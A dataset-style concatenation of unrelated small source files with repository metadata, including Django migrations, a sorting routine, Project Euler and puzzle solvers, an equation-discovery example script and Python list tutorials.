t2 = threading.Thread(target=catch_msg,args = (connectionSocketY,"Client Y"))
t1.start()
t2.start()
t2.join()
t1.join()
msg = sentences[0] + " received before " + sentences[1]
connectionSocketX.send(msg.encode())
connectionSocketY.send(msg.encode())
connectionSocketX.close() # free up the ports since we no longer need them
connectionSocketY.close()
| UTF-8 | Python | false | false | 1,608 | py | 2 | serverTCP.py | 2 | 0.732368 | 0.710957 | 0 | 54 | 28.407407 | 109 |
Starenesha/django-prj-test | 7,267,084,687,475 | b051db1e23c63cd872bcc9487204cd93249d6119 | 1ad01cf671ec81155e470030999b5fdd13919d58 | /meter/migrations/0002_csvupload_meter.py | d3514d24289cfb11152288e62438f58c752a988c | []
| no_license | https://github.com/Starenesha/django-prj-test | affa250087b6ffb2783c654b32ab54ac3686799b | c5ceaca4fb997eb541b8dded36c72c8e98e50730 | refs/heads/master | 2023-04-27T10:49:43.645172 | 2021-08-08T16:16:44 | 2021-08-08T16:16:44 | 199,383,673 | 0 | 0 | null | false | 2023-04-21T20:34:53 | 2019-07-29T05:23:35 | 2021-08-08T16:16:47 | 2023-04-21T20:34:51 | 37 | 0 | 0 | 5 | Python | false | false | # Generated by Django 2.2.3 on 2019-08-06 02:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('meter', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='csvupload',
name='meter',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='meter.Meter'),
),
]
| UTF-8 | Python | false | false | 467 | py | 13 | 0002_csvupload_meter.py | 7 | 0.620985 | 0.5803 | 0 | 19 | 23.578947 | 111 |
krishna0512/drf | 6,236,292,515,787 | 37eedf304e2e412c25aeb2aab1d9b2fff6828b0c | 5fbc48cb9d5ff7688be323434e8879563c97256e | /mysite/polls/migrations/0008_auto_20150926_1129.py | 123b7be296f8fa84471c13a480514885acf20841 | []
| no_license | https://github.com/krishna0512/drf | c92defb47420f2ef124fa6964e7e78e327fdd2dd | 2516e069d88466c5fce2252d5c4eedc3d07920a1 | refs/heads/master | 2021-01-10T19:54:16.282489 | 2015-10-01T11:15:23 | 2015-10-01T11:15:23 | 37,807,772 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0007_student'),
]
operations = [
migrations.AddField(
model_name='question',
name='correct',
field=models.CharField(default='', max_length=20000, verbose_name=b'list of users given correct answers.'),
preserve_default=False,
),
migrations.AddField(
model_name='question',
name='incorrect',
field=models.CharField(default='', max_length=20000, verbose_name=b'list of users given incorrect ans...'),
preserve_default=False,
),
]
| UTF-8 | Python | false | false | 756 | py | 24 | 0008_auto_20150926_1129.py | 18 | 0.587302 | 0.56746 | 0 | 26 | 28.076923 | 119 |
WaterH2P/Algorithm | 2,070,174,270,608 | 37d995362378bdad21e9b2d4bffa124cb0871cf4 | 9cc3dfb89e7243595d0a76c6e0a4e77a04230eb2 | /Python/Sort/insert.py | 4cf279863488f506e1687a1158e2e980cf6dca75 | []
| no_license | https://github.com/WaterH2P/Algorithm | a369f5013eb52108402b6d8ab97cdbbdfb75cf35 | 35e18c8b81342a84dec4a5fdbb5ddf4b6447ae3d | refs/heads/master | 2022-11-28T18:19:57.145915 | 2020-08-04T12:12:13 | 2020-08-04T12:12:13 | 211,606,354 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def sort_insert(l):
index, maxI = 0, len(l)
    while index < maxI - 1:
i = index + 1
        while i > 0 and l[i] < l[i-1]:
l[i], l[i-1] = l[i-1], l[i]
i -= 1
index += 1
return l
L = [2, 5, 7, 1, 4, 3, 0]
L2 = sort_insert(L)
print(L2) | UTF-8 | Python | false | false | 286 | py | 147 | insert.py | 146 | 0.412587 | 0.34965 | 0 | 13 | 21.076923 | 39 |
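# Editor's note: sort_insert is a plain in-place insertion sort, O(n^2) comparisons in the
# worst case and O(n) when the input is already sorted. The call above should print
# [0, 1, 2, 3, 4, 5, 7].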
thisispratt/hacktoberfest_2020 | 455,266,563,392 | b445abee05726edd70673fd34d75cb119a92a70d | 7b59cba866493d8c4a57c4b48e53a266b118e07a | /Python/1.py | 205d4a934a1d82d86d87514c19c0d67016288171 | []
| no_license | https://github.com/thisispratt/hacktoberfest_2020 | afa3d5f80da76865b35494b6f424c9995a58cc14 | c31937273d815715e38d6123d130c8f4e93968f3 | refs/heads/master | 2023-04-20T02:39:47.333188 | 2021-10-23T20:31:20 | 2021-10-23T20:31:20 | 212,836,169 | 52 | 106 | null | null | null | null | null | null | null | null | null | null | null | null | null | #command used to print something
print("Hello world")
| UTF-8 | Python | false | false | 56 | py | 61 | 1.py | 48 | 0.75 | 0.75 | 0 | 2 | 26 | 32 |
KaiOWhatmore/PE-Algorithms | 10,376,640,997,859 | 5a86dc52e7907f6f5e44437a91014918f617b791 | 226ff10abebba77f5367a7d5a1ee2d127d53da1b | /Project Euler/PE_P17_Sum Of Letters_RadiiofCircle.py | ea12d5803a56856ab41bbfeda72a0b2705bb102b | []
| no_license | https://github.com/KaiOWhatmore/PE-Algorithms | 3f69108af5cccd639c26f1981d8517ef5ce396b0 | 1758ea7e089916c14846cdd2112dd65b69e04fd1 | refs/heads/master | 2023-06-01T14:25:51.312242 | 2021-06-16T09:33:22 | 2021-06-16T09:33:22 | 377,435,785 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # dictionary to store the values
dic = {n: 0 for n in range(0, 1001)}
# intial values given manually
dic[0] = 0 # ''
dic[1] = 3 # 'one'
dic[2] = 3 # 'two'
dic[3] = 5 # 'three'
dic[4] = 4 # 'four'
dic[5] = 4 # 'five'
dic[6] = 3 # 'six'
dic[7] = 5 # 'seven'
dic[8] = 5 # 'eight'
dic[9] = 4 # 'nine'
dic[10] = 3 # 'ten'
dic[11] = 6 # 'eleven'
dic[12] = 6 # 'twelve'
dic[13] = 8 # 'thirteen'
dic[14] = 8 # 'fourteen'
dic[15] = 7 # 'fifteen'
dic[16] = 7 # 'sixteen'
dic[17] = 9 # 'seventeen'
dic[18] = 8 # 'eighteen'
dic[19] = 8 # 'nineteen'
dic[20] = 6 # 'twenty'
dic[30] = 6 # 'thirty'
dic[40] = 5 # 'forty'
dic[50] = 5 # 'fifty'
dic[60] = 5 # 'sixty'
dic[70] = 7 # 'seventy'
dic[80] = 6 # 'eighty'
dic[90] = 6 # 'ninety'
# for loop to generate the values for 21-99
# as we have alreay entered the values under
# 20 manually
for i in range(21, 100):
tens = int(i / 10) * 10
ones = i - tens
dic[i] = dic[tens] + dic[ones]
# for loop to generate values for 100-999
for i in range(100, 1000):
hundreds = int(i / 100)
tens_ones = i - hundreds * 100
# if the value of tens and ones place is 0
# just use 'hundred' instead of 'and hundred'
if tens_ones == 0:
dic[i] = dic[hundreds] + 7 # 'hundred'
else:
# 10 refers - 'and hundred'
dic[i] = dic[hundreds] + 10 + dic[tens_ones]
dic[1000] = 11 # 'one thousand'
# printing the value of each letter digit sum
print(sum(dic.values()))
| UTF-8 | Python | false | false | 1,493 | py | 23 | PE_P17_Sum Of Letters_RadiiofCircle.py | 21 | 0.5499 | 0.464836 | 0 | 84 | 16.77381 | 52 |
vnleonenko/EPDE | 8,323,646,649,874 | c35e9e79dc5c961ff927e255612b41416dbab9f7 | af562c3070916266bfce0b31fe094aef9e4d7ac7 | /tests/system/ode_textbook_interfaced.py | 9abe3bd32ed296fb9a81bd0006272af01c1c0328 | [
"BSD-3-Clause"
]
| permissive | https://github.com/vnleonenko/EPDE | fb9cfc29cec24caa9c69a7688974e50fb7dacd7d | c9f5f4a3c593dbd17987576bfcabf5554c41ed66 | refs/heads/main | 2023-08-15T02:36:05.622484 | 2021-09-30T10:40:59 | 2021-09-30T10:40:59 | 417,873,275 | 0 | 0 | NOASSERTION | true | 2021-10-16T15:46:12 | 2021-10-16T15:46:12 | 2021-10-15T15:18:18 | 2021-10-14T16:01:06 | 583 | 0 | 0 | 0 | null | false | false | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 13 14:45:14 2021
@author: mike_ubuntu
"""
import numpy as np
import epde.interface.interface as epde_alg
from epde.interface.prepared_tokens import Custom_tokens, Trigonometric_tokens, Cache_stored_tokens
from epde.evaluators import Custom_Evaluator
if __name__ == '__main__':
t = np.linspace(0, 4*np.pi, 1000)
u = np.load('/media/mike_ubuntu/DATA/EPDE_publication/tests/system/Test_data/fill366.npy') # loading data with the solution of ODE
    # Trying to create population for multi-objective optimization with only
# derivatives as allowed tokens. Spoiler: only one equation structure will be
# discovered, thus MOO algorithm will not be launched.
dimensionality = t.ndim - 1
epde_search_obj = epde_alg.epde_search()
'''
--------------------------------------------------------------------------------------------------------------------------------
    Since this example uses custom, user-defined token families, we first have to introduce a
    function that evaluates the token values on the grid which defines the domain where the
    differential equation is sought, with all other parameters held fixed.
    If a family is "generated" by a single token (for example, functions inverse to the grid
    values, of the form 1/x^n), a single lambda or ordinary function can be supplied. If the
    family is expected to contain several functions, use a dictionary whose keys are the
    function names and whose values are the corresponding lambda or ordinary functions.
    Signature of the evaluation function: no named arguments, only *args and **kwargs. All
    function parameters are passed through kwargs, while *args receives the argument values
    (the grid coordinates).
'''
custom_trigonometric_eval_fun = {'cos' : lambda *grids, **kwargs: np.cos(kwargs['freq'] * grids[int(kwargs['dim'])]) ** kwargs['power'],
'sin' : lambda *grids, **kwargs: np.sin(kwargs['freq'] * grids[int(kwargs['dim'])]) ** kwargs['power']}
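    # For illustration (editor's addition): each evaluator is called with the grids as positional
    # arguments and the token parameters as keyword arguments, e.g.
    #   custom_trigonometric_eval_fun['sin'](t, freq = 1., dim = 0, power = 1)
    # returns sin(t) evaluated on the grid t.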
'''
--------------------------------------------------------------------------------------------------------------------------------
    Define the object that evaluates token values inside the evolutionary algorithm. Its
    arguments are the evaluation function(s) defined above and a list with the parameter names.
'''
custom_trig_evaluator = Custom_Evaluator(custom_trigonometric_eval_fun, eval_fun_params_labels = ['freq', 'dim', 'power'])
'''
--------------------------------------------------------------------------------------------------------------------------------
    Specify, through a Python dictionary, the ranges from which the parameters of the token
    evaluation functions may be drawn.
    The keys must be strings and must correspond to the arguments of the lambda functions that
    evaluate the token values. For the trigonometric evaluation function introduced above, the
    frequency, the power of the function and the grid dimension along which the argument is
    taken are required, under the keys 'freq', 'power' and 'dim' respectively. The values stored
    under these keys are the bounds within which the parameter values are searched during
    optimization, given as a Python tuple of 2 elements: the lower and the upper bound.
    Integer bounds correspond to discrete values (for example, with 'power' : (1, 3) the powers
    1, 2 and 3 are used); with real-valued (float) bounds the parameter values are drawn from a
    uniform distribution between them. For example, with 'freq' : (1., 3.) the values are
    sampled from np.random.uniform(low = 1., high = 3.), e.g. 2.7183...
'''
trig_params_ranges = {'power' : (1, 1), 'freq' : (0.95, 1.05), 'dim' : (0, dimensionality)}
'''
--------------------------------------------------------------------------------------------------------------------------------
    Next, we have to define how much two parameter values may differ while the functions are
    still considered identical; this is needed to build unique equation structures and unique
    terms inside them. For instance, for the evolutionary algorithm the difference between
    sin(3.135 * x) and sin(3.145 * x) can be treated as negligible, so the tokens are considered
    equal.
    The values are specified as follows: the dictionary key is the parameter name, and the value
    is the maximum difference within which tokens are considered identical.
    By default, discrete parameters are equal only on an exact match, while real-valued
    arguments are equal when the difference is smaller than 0.05 * (max_param_value - min_param_value).
'''
trig_params_equal_ranges = {'freq' : 0.05}
    custom_trig_tokens = Custom_tokens(token_type = 'trigonometric', # Pick a name for the token family.
                                       token_labels = ['sin', 'cos'], # Names of the family's tokens, given as a Python list.
                                                                      # They must match the keys of the lambda-function dictionary above.
                                       evaluator = custom_trig_evaluator, # Use the evaluator object initialized earlier.
                                       params_ranges = trig_params_ranges, # Use the parameter ranges declared above.
                                       params_equality_ranges = trig_params_equal_ranges) # Use the declared parameter "equality" ranges.
'''
    Extend the allowed pool of tokens by adding functions that are inverse to the coordinate
    values (of the form 1/x, 1/t, etc.). To obtain their values we define a single lambda
    function `custom_inverse_eval_fun`, and then the corresponding token family.
'''
custom_inverse_eval_fun = lambda *grids, **kwargs: np.power(grids[int(kwargs['dim'])], - kwargs['power'])
custom_inv_fun_evaluator = Custom_Evaluator(custom_inverse_eval_fun, eval_fun_params_labels = ['dim', 'power'], use_factors_grids = True)
inv_fun_params_ranges = {'power' : (1, 2), 'dim' : (0, dimensionality)}
    custom_inv_fun_tokens = Custom_tokens(token_type = 'inverse', # Pick a name for the family of inverse functions.
                                       token_labels = ['1/x_{dim}',], # Names of the family's tokens, given as a Python list.
                                                                      # Only one token of this type is used, so the list has a single element.
                                       evaluator = custom_inv_fun_evaluator, # Use the evaluator object initialized earlier.
                                       params_ranges = inv_fun_params_ranges, # Use the parameter ranges declared above.
                                       params_equality_ranges = None) # None, because the defaults (discrete parameters are
                                                                      # equal only on an exact match) are fine here.
boundary = 10
custom_grid_tokens = Cache_stored_tokens(token_type = 'grid',
boundary = boundary,
token_labels = ['t'],
token_tensors={'t' : t},
params_ranges = {'power' : (1, 1)},
params_equality_ranges = None)
epde_search_obj.fit(data = u, boundary=boundary, equation_factors_max_number = 2, coordinate_tensors = [t,],
additional_tokens = [custom_trig_tokens, custom_inv_fun_tokens, custom_grid_tokens], field_smooth = False, memory_for_cache=5, data_fun_pow = 2)
epde_search_obj.equation_search_results(only_print = True, level_num = 1) # showing the Pareto-optimal set of discovered equations | UTF-8 | Python | false | false | 11,038 | py | 53 | ode_textbook_interfaced.py | 49 | 0.608216 | 0.598651 | 0 | 118 | 68.110169 | 168 |
bitmapup/patricia_trie | 14,714,557,999,374 | 50436488b9dc1024dccc7c8fcf1d1d66d0fd99a4 | 3b372f7d4e2cd18c5481a0602393c221a152665a | /coppredict/evaluation.py | e52e4e0e5127a85de0dddfec47ce15a32e5f30a6 | [
"MIT"
]
| permissive | https://github.com/bitmapup/patricia_trie | 462b1785138efef937f7b6af414c1044151f5299 | 59a82dd04f82030c9f0995859e5dfcb75ab54476 | refs/heads/main | 2023-08-11T03:46:41.848163 | 2021-09-26T05:02:14 | 2021-09-26T05:02:14 | 363,258,444 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import os
import psutil
import time
def get_process_memory():
process = psutil.Process(os.getpid())
return process.memory_info().rss
def get_time():
time_v = time.time()
return time_v
def get_time_build(time_start, time_end, message):
if time_start != -1 and time_end != -1:
return "Time execution: " + message + str(time_end - time_start) + ' seconds' + '\n'
def get_memory_build(mem_start, mem_end, message):
if mem_start != -1 and mem_end != -1:
return "Memory Used: " + message + str((mem_end - mem_start)/1024) + ' Bytes' + '\n'
| UTF-8 | Python | false | false | 607 | py | 12 | evaluation.py | 7 | 0.609555 | 0.594728 | 0 | 25 | 23.28 | 92 |
yaelBrown/Codewars | 14,989,435,908,468 | 59b87522b345b6710fe2c5bd82bac49319b13b2e | ee9655d3ffcdb70ae68692f400096b479b39d0f7 | /Python/MovingZerosToEnd.py | 3a1fab93c3ba875b155df0058b8756cfcad6250a | []
| no_license | https://github.com/yaelBrown/Codewars | 4f123387b8c4ea6e55ec1ff5d2ae9b1d674c06cf | efa10770b593e48579c256b9d6b69deede64e9ba | refs/heads/master | 2020-11-27T16:02:43.409465 | 2020-03-20T00:59:49 | 2020-03-20T00:59:49 | 229,521,981 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Write an algorithm that takes an array and moves all of the zeros to the end, preserving the order of the other elements.
move_zeros([false,1,0,1,2,0,1,3,"a"]) # returns[false,1,1,2,1,3,"a",0,0]
"""
def move_zeros(l):
out = []
count = 0
for x in l:
if x == 0 and not type(x) == bool:
count += 1
continue
out.append(x)
if count > 0:
for y in range(count):
out.append(0)
return out
print(move_zeros([False,1,0,1,2,0,1,3,"a"]))
# print(0 == False) | UTF-8 | Python | false | false | 498 | py | 51 | MovingZerosToEnd.py | 50 | 0.586345 | 0.532129 | 0 | 28 | 16.821429 | 121 |
Gincral/cp468-artificial-intelligence | 11,098,195,505,341 | 3d31db510398dcf922c0433ffc1f478ab5f805a5 | 2cde2eb5b828745f2bce2ec11b99ce08b41b4256 | /asgn01/8-puzzle.py | d10447d99bc0c08e692f77bb4ab7e08a935a3964 | []
| no_license | https://github.com/Gincral/cp468-artificial-intelligence | d9ba5b561f3b543fed617a8de682a3ffd32d258e | 9a4c4a969ce03100dd1c63e9101ef5ef79504f02 | refs/heads/main | 2023-02-01T02:54:50.225748 | 2020-12-11T20:44:02 | 2020-12-11T20:44:02 | 300,418,950 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import random
import heapq
import sys
import csv
class node:
def __init__(self, state, action, pathCost, heuristicCost):
self.state=state #state/data, position of all tiles
self.action=action #action required to get to this state from parent
self.pathCost=pathCost #cost from initial state to this node
self.heuristicCost = heuristicCost #informed heuristic cost
class N_Puzzle:
absolute=abs #locally saving absolute function to increase speed of heuristic calculations
def __init__(self, goalState, size):
self.goal=goalState
self.goalIndex={}
for i in range(size):
self.goalIndex[goalState[i]]=i
self.size=size #length of array, 9 for 8 puzzle, 16 for 15 puzzle 25, for 24 puzzle
self.numRows=int(np.sqrt(size)) #number of rows/columns
def findTile(self,puzzle,tile):
for index in range(self.size):
if puzzle[index]==tile:
return index
def calculateHeuristicCost(self, puzzle):
if self.heuristic == "h1":
# Calculation for h1: Number of misplaced tiles
h1 = 0
for tile in range(self.size):
if puzzle[tile] != 0 and puzzle[tile] != self.goal[tile]:
h1 += 1
return h1
elif self.heuristic == "h2":
# Calculation for h2: Total Manhattan distance
h2 = 0
for row in range(self.size):
if puzzle[row] != 0:
tile = puzzle[row]
goalPos = self.goalIndex[tile]
manhattan = self.absolute(row//self.numRows - goalPos//self.numRows) + self.absolute(row%self.numRows - goalPos%self.numRows)
h2 += manhattan
return h2
elif self.heuristic == "h3":
# Linear Conflict + Manhattan Distance/Taxicab geometry
h3 = 0
conflictCount = 0
for index in range(self.size):
if puzzle[index] != 0:
tile = puzzle[index]
goalPos = self.goalIndex[tile]
manhattan = self.absolute(index//self.numRows - goalPos//self.numRows) + self.absolute(index%self.numRows - goalPos%self.numRows)
h3 += manhattan
conflictCount = self.linearConflict(index, tile, puzzle,self.goal)
h3 += conflictCount*2 #every conflict requires at least 2 moves to fix
return h3
#count how many times two tiles are in the same row but must pass each other to reach their goal positions
def linearConflict(self, index, tile, puzzle, goal):
conflictCount = 0
tileGoal = self.goalIndex[tile]
if (index//self.numRows==tileGoal//self.numRows and (tileGoal%self.numRows-index%self.numRows)>0): #right row
for i in range((index%self.numRows)+1, self.numRows):
target = puzzle[self.numRows*(index//self.numRows)+i]
if target!=0:
targetGoal = self.goalIndex[target]
if (targetGoal//self.numRows==tileGoal//self.numRows and targetGoal%self.numRows<tileGoal%self.numRows): conflictCount+=1
if (index//self.numRows==tileGoal//self.numRows and (tileGoal%self.numRows-index%self.numRows)>0):
for i in range(index//self.numRows+1, self.numRows):
target = puzzle[i%self.numRows+self.numRows*(index//self.numRows)]
if target!=0:
targetGoal = self.goalIndex[target]
if (targetGoal%self.numRows==index%self.numRows and targetGoal//self.numRows<tileGoal//self.numRows): conflictCount+=1
return conflictCount
def calcInversions(self,puzzle):
size=self.size
inversions = 0
for i in range(size):
for j in range(i+1,size):
tile1=puzzle[i]
tile2=puzzle[j]
#Make sure not to count the empty tile
if(tile1 != 0 and tile2 != 0 and tile1 > tile2):
inversions+=1
return inversions
#generate random Puzzle and check that it is solvable before setting the data
def generateRandomPuzzle(self):
solvable=False
puzzle=[0,*range(1,self.size)]
while (not solvable):
random.shuffle(puzzle)
solvable=self.checkIfSolvable(puzzle)
self.data=puzzle
def checkIfSolvable(self,puzzle):
size=self.size
inversions = self.calcInversions(puzzle)
if (size%2==1 ):
return inversions%2 == 0
else:
row=self.findTile(puzzle,0)//self.numRows
if (row%2==1 and inversions%2==1) or (row%2==0 and inversions%2==0):
return True
else:
return False
def setHeuristic(self, heuristic):
self.heuristic = heuristic
def expandNode(self, parentNode):
emptyTilePos = self.findTile(parentNode.state,0)
row = int(emptyTilePos//self.numRows)
col = int(emptyTilePos%self.numRows)
children = []
# Try to create up to 3 new possible states by moving a tile into the empty space, avoiding reversing previous move
# Move tile up
if int(row) > 0 and parentNode.action!="DOWN":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*(row-1)+col]
newState[self.numRows*(row-1)+col] = 0
children.append(node( newState, "UP", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile down
if int(row) < self.numRows - 1 and parentNode.action!="UP":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*(row+1)+col]
newState[self.numRows*(row+1)+col] = 0
children.append(node( newState, "DOWN", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile right
if int(col) > 0 and parentNode.action!="RIGHT":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*row+col-1]
newState[self.numRows*row+col-1] = 0
children.append(node( newState, "LEFT", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile left
if int(col) < self.numRows - 1 and parentNode.action!="LEFT":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*row+col+1]
newState[self.numRows*row+col+1] = 0
children.append(node( newState, "RIGHT", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
return children
def solve(self):
root = (self.calculateHeuristicCost(self.data),0,node(self.data, None, 0, self.calculateHeuristicCost(self.data)))
frontier = []
heapq.heappush(frontier,root) #adds root to frontier using heap method which always keeps smallest node in index 0
reached = {} #stores the nodes that have already been searched
i=0 # ensures every node has unique priority without ordering the states outside of heuristic and path cost
nodesExpanded = 0
newNode = None
while (frontier) and nodesExpanded<15000000: #continue until frontier is empty or nodes expanded reaches 15 million
newNode = heapq.heappop(frontier)[2] # Retrives first Node in priority Queue
if (newNode.state==self.goal):
return nodesExpanded, newNode.pathCost
childNodes = self.expandNode(newNode) #find children node
nodesExpanded += 1
for child in childNodes:
key = str(child.state)
if key in reached:
reachedCost = reached[key].pathCost + reached[key].heuristicCost
if key not in reached or reachedCost>child.heuristicCost+child.pathCost:
reached[key] = child
childTuple=(child.heuristicCost+child.pathCost,i,child)
heapq.heappush(frontier,childTuple) #pushes child into heap queue
i+=1
#no solution found in 15million states
return (nodesExpanded,-1)
def main():
if len(sys.argv) == 1 or sys.argv[1] == '0':
print("Please enter a valid puzzle size")
print("Enter 3, 4, 5 for 8, 15 and 24 puzzle respectively")
sys.exit()
size=int(sys.argv[1]) # 3, 4, 5 for 8, 15 and 24 puzzle respectively
goal = [*range(size*size)]
myFile = open('PreSubTest.csv', 'w', newline='\n') #File that the nodes expanded and moves are saved too for each puzzle
writer = csv.writer(myFile)
writer.writerows([["H1 Nodes","H1 Moves","H2 Nodes","H2 Moves","H3 Nodes","H3 Moves",]])
for i in range(100):
puzzle = N_Puzzle(goal,size*size)
puzzle.generateRandomPuzzle()
print("Puzzle #"+str(i+1))
print(puzzle.data)
puzzle.setHeuristic("h1")
resulth1=puzzle.solve()
puzzle.setHeuristic("h2")
resulth2=puzzle.solve()
puzzle.setHeuristic("h3")
resulth3=puzzle.solve()
results=[[resulth1[0],resulth1[1],resulth2[0],resulth2[1],resulth3[0],resulth3[1]]]
writer.writerows(results)
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 9,511 | py | 7 | 8-puzzle.py | 3 | 0.603932 | 0.587005 | 0 | 198 | 47.040404 | 149 |
hongtao510/u_tool | 9,792,525,471,320 | a00ee5aa0a8b2a97d2494d3a5341ad8517b4a60e | d89a482aaf3001bbc4515f39af9ba474e1ae6062 | /ubertool/ecosystem_inputs_db.py | 283bfbca15444b837a0a946d0d6a4130679a39f9 | []
| no_license | https://github.com/hongtao510/u_tool | 2925e3694aba81714cf83018c3f8520a7b503228 | 98c962cfb1f53c4971fb2b9ae22c882c0fae6497 | refs/heads/master | 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 31 11:55:40 2012
@author: jharston
"""
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
from django import forms
from django.db import models
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
from ecosystem_inputs import EcosystemInputs
import datetime
#YN = (('Yes','Yes'),('No','No'))
class EcoInp(forms.Form):
user_ecosystem_configuration = forms.ChoiceField(label="User Saved Ecosystem Inputs Configuration",required=True)
config_name = forms.CharField(label="EcosystemInputs Configuration Name", initial="eco-config-%s"%datetime.datetime.now())
x_poc = forms.FloatField(label='Concentration of particulate organic carbon (kg OC/L)', initial='0')
x_doc = forms.FloatField(label='Concentration of dissolved organic carbon (kg OC/L)', initial='0')
c_ox = forms.FloatField(label='Concentration of dissolved oxygen (mg O2/L)', initial='5.0')
w_t = forms.FloatField(label='Water temperature (degrees Celsius)')
c_ss = forms.FloatField(label='Concentration of suspended solids (kg/L)')
oc = forms.FloatField(label='Sediment organic Carbon (%)') | UTF-8 | Python | false | false | 1,264 | py | 740 | ecosystem_inputs_db.py | 166 | 0.744462 | 0.730222 | 0 | 27 | 45.851852 | 126 |
Holomoro/django_chase_comic | 1,082,331,771,419 | 9162fddfccad8e90cca3b1e6e41b66f718a24d7f | ad463ed0176e6ec4cdc3ca361879ea9f5d05a8b9 | /kahz_comic/comics/migrations/0003_auto_20150220_1201.py | 7ec5e33213fecc132cb5a52bf1e80777ba0c9b04 | []
| no_license | https://github.com/Holomoro/django_chase_comic | 53c0c76241a6bb7d4473765992dfa53623c29661 | 6065aa27d9cd7df110d0e76a020e8e4bae734000 | refs/heads/master | 2016-09-11T13:36:37.658299 | 2015-03-18T14:01:55 | 2015-03-18T14:01:55 | 31,089,554 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('comics', '0002_auto_20150220_0026'),
]
operations = [
migrations.RemoveField(
model_name='comic',
name='comic_image',
),
migrations.AddField(
model_name='comic',
name='comic_link',
field=models.URLField(default='http://i.imgur.com/ZXFbo4L.jpg'),
preserve_default=False,
),
]
| UTF-8 | Python | false | false | 571 | py | 5 | 0003_auto_20150220_1201.py | 2 | 0.558669 | 0.527145 | 0 | 24 | 22.791667 | 76 |
eunh1107/StudyRaspberry-Pi | 14,439,680,095,404 | 90f15e2f8a35e122b91bc93f84caad4ed0baca56 | ff6cc81031d8cbe4d538b218a5da0dfb2f3b02be | /StudyPython/210705_003/210705_003/list05.py | 6291cfae0a950bc124e58e4b290e72520afe8941 | []
| no_license | https://github.com/eunh1107/StudyRaspberry-Pi | ff19b87da861f07a963f28899db73adff31ec971 | 679af2f61b90bd6b7fcf3fe0a5fe7ad6ee5ce676 | refs/heads/main | 2023-07-04T00:07:37.453850 | 2021-08-12T17:24:14 | 2021-08-12T17:24:14 | 382,286,335 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | aa = [30, 10, 20]
print("현재의 리스트 : %s" % aa)
# aa 리스트 전체 출력은 문자열로 인식하므로 %s는 aa 리스트를 대입
aa.append(40) # 요소를 하나 추가
print("append 후의 리스트 : %s" % aa) # 요소 추가 후에 aa 리스트를 출력
aa.pop() # stack 알고리즘 적용(마지막 1개를 꺼냄) # aa 리스트의 제일 마지막 요소를 뺀다.
print("pop 후의 리스트 : %s" % aa) # 추가 후에 다시 요소를 빼고 나서 출력
aa.sort() # 리스트 요소 값들을 오름차순으로 정렬
print("sort 후의 리스트 : %s" % aa) # 정렬 후에 출력
aa.reverse() # 리스트 요소 값들을 역순으로 정렬
print("reverse 후의 리스트 : %s" % aa) # 역순 정렬 후에 출력
aa.insert(2, 222) # aa 리스트에 세 번째 위치에 222값을 추가
print("insert(2, 222) 후의 리스트 : %s" % aa) # 세 번째 위치에 추가 후에 출력
print("20값의 위치 : %d" % aa.index(20)) # 20이라는 요소 값이 있는 위치에 출력
aa.remove(222) # 222 요소 값을 리스트에서 삭제
print("remove(222) 후의 리스트 : %s" % aa) # 222 요소 값을 삭제 후에 출력
aa.extend([77,88,77]) # 다른 리스트를 확장
print("extend([77,88,77]) 후의 리스트 : %s" % aa) # 리스트 확장 후에 출력
print("77값의 개수 : %d" % aa.count(77)) # aa리스트에 77 요소 값이 몇 개 있는지 출력 | UTF-8 | Python | false | false | 1,488 | py | 57 | list05.py | 50 | 0.557082 | 0.497886 | 0 | 19 | 48.842105 | 67 |
junyechen/PAT-Advanced-Level-Practice | 11,321,533,827,375 | a4e036874e5db5d808af41b11f5b575f2063d539 | 556da038494ad93b03923577b48f89dd6d70fb48 | /1154 Vertex Coloring.py | c09e6112712bb0fa2d5489c29a08c7fbee5999f0 | []
| no_license | https://github.com/junyechen/PAT-Advanced-Level-Practice | f5c9f604c458965c2165960aaac714f69ce1057b | 401c9d3040a0273c0e2461c963b781bcebd33667 | refs/heads/master | 2020-06-19T10:55:19.564725 | 2020-05-12T10:21:14 | 2020-05-12T10:21:14 | 196,684,047 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
A proper vertex coloring is a labeling of the graph's vertices with colors such that no two vertices sharing the same edge have the same color. A coloring using at most k colors is called a (proper) k-coloring.
Now you are supposed to tell if a given coloring is a proper k-coloring.
Input Specification:
